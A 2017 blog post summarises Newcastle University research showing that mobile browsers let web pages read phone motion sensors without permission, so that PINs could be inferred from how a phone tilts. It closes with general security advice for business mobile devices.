Monday, April 17, 2017

Your PIN Numbers Can Be Guessed When You Tilt Your Phone

Researchers from Newcastle University have discovered that how you tilt your smart-phone when you type in your secret PINs and passwords could increase the likelihood of them been obtained by hackers due to mobile browsers and phone sensor vulnerabilities.

Accessing Your Smartphone’s ‘Silent’ Sensors

The team from the university's School of Computing Science believe that the many (typically 25+) silent sensors such as gyroscopes, rotation sensors, and accelerometers that are included in today’s smart-phones, tablets and wearables could provide a way for criminals to use malware-loaded web pages (viewed through your mobile browser) to spy on what we type in.

The fact that the sensors in one device are made by many different companies is also thought to increase the risk of being spied upon.

Mobile Browser Flaw Means No Permission Needed

The researchers found that a security deficiency in all major mobile browsers (including Safari, Chrome, Opera and Firefox) means that embedded JavaScript code in a web page is able to access the motion and orientation sensors on a mobile phone without requiring any user permission.

Tilting Danger

One very interesting aspect of the research is that it was possible to work out which part of a web page that a smart-phone user is clicking on, and what they are typing in by the way that their smart-phone is tilted at the time.

The researchers (who were able to obtain 4-digt Android pins with 70% accuracy on the first guess and 100% on the 5th) have said that this was made possible using a known web page loaded with spyware program, coupled with each person’s unique way of holding (and tilting) a smart phone. This unique, personal phone holding / tapping pattern could be obtained from the sensor information in the phone.

Sounds A Bit Complicated

It has been reported that the vulnerability identified by the researchers is something that phone manufacturers are aware of, but have not yet figured out how to fix (or deemed the risk pressing enough to commit significant resources to).

What Does This Mean For Your Business?

Even though the particular risk identified in this research appears to be one of the less obvious ones, and one for which there is no fix / patch as yet, taking general security precautions with your business mobile devices is important anyway. For example, keep security software current, delete the apps you no longer use, use strong passwords, use security and privacy settings on websites and apps, disable WiFi and Bluetooth when not in use, beware of fraudulent text messages / calls / voicemails, and be careful about what personal information you store on the device or give out  through apps and websites.

No comments: